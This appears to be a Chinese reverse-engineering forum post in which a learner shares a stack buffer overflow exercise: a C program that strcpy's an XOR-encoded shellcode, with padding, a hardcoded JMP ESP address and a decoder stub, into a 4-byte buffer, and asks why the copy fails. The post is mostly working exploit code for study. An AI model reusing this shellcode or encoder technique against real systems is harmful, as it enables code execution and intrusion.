我实验了以下,strcpy是只能最大复制255个字符嘛?
下面是我写的一段shellcode
char *shell="\x41\x41\x41\x41\x41\x41\x41\x41“
”\x76\x7f\x33\xf3" //JMP ESP
"\x83\xC0\x14" //ADD EAX,14
"\x33\xC9" //XOR ECX,ECX
"\x8A\x1C\x08" //MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x44" //XOR BL,44 //0x44是该编码的key
"\x88\x1C\x08" //MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" //INC ECX
"\x80\xFB\x90" //CMP BL,90
"\x75\xF1" //JNZ SHORT "\x8A\x1C\x08"
//编码后shellcode
"\x22\x77\x8d\x12\x20\xcf\x71\x74\x44\x44\x44\xcf\x32\x48\xcf\x32"
"\x58\xcf\x02\x4c\xcf\x3a\x64\xcf\x72\x22\x7d\x0b\x5c\x31\xb6\x11"
"\xc7\xa8\x64\xcf\xa8\xcd\x01\x40\x2c\x76\x30\xd5\x48\x14\xac\x07"
"\x44\x44\x44\x2c\x28\x28\x44\x44\x2c\x36\x30\x6a\x20\x2c\x29\x37"
"\x32\x27\xcf\x88\x15\xbb\x94\x2c\x48\xe4\x97\x6f\x14\xac\x60\x44"
"\x44\x44\x2e\x44\x2c\x6a\x21\x3c\x21\x2c\x27\x25\x28\x27\xcf\x90"
"\x16\xbb\x94\x2c\x27\xcd\x95\x0b\xcf\x09\x40\x15\xac\x41\x44\x44"
"\x44\x2e\x45\xbb\x94\x87\xcf\xb0\xc7\x82\x40\x11\xcf\x6a\xcf\x01"
"\x78\xcf\x10\x41\x3c\x47\x91\xcf\x0e\x5c\xcf\x1e\x64\x47\x99\x16"
"\xcf\x3a\x40\xcf\x12\x4c\x0d\x15\xcf\x70\xcf\x47\xb1\x77\x96\x4b"
"\xfa\x42\x7e\x80\x30\x4b\xcf\x8e\x85\x85\x5d\x85\x8e\x43\x4f\x95"
"\x47\x94\x02\xaf\xae\x7f\x93\x1d\x30\x40\xa6\x9f\xaf\x52\x1e\xcf"
"\x1e\x60\x47\x99\x22\xcf\x48\x0f\xcf\x1e\x58\x47\x99\xcf\x40\xcf"
"\x47\x81\x19\x87\x87\xd4\x44";
void main()
{
char ch[4];
strcpy(ch,shell);
}
调试发现这段shellcode本身是可以运行的,但用strcpy填充缓冲区发现该函数会出错,是因为strcpy不能复制某个字符,还是shellcode大小需要受到一定的限制呢,或者堆栈大小事有限制的?
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)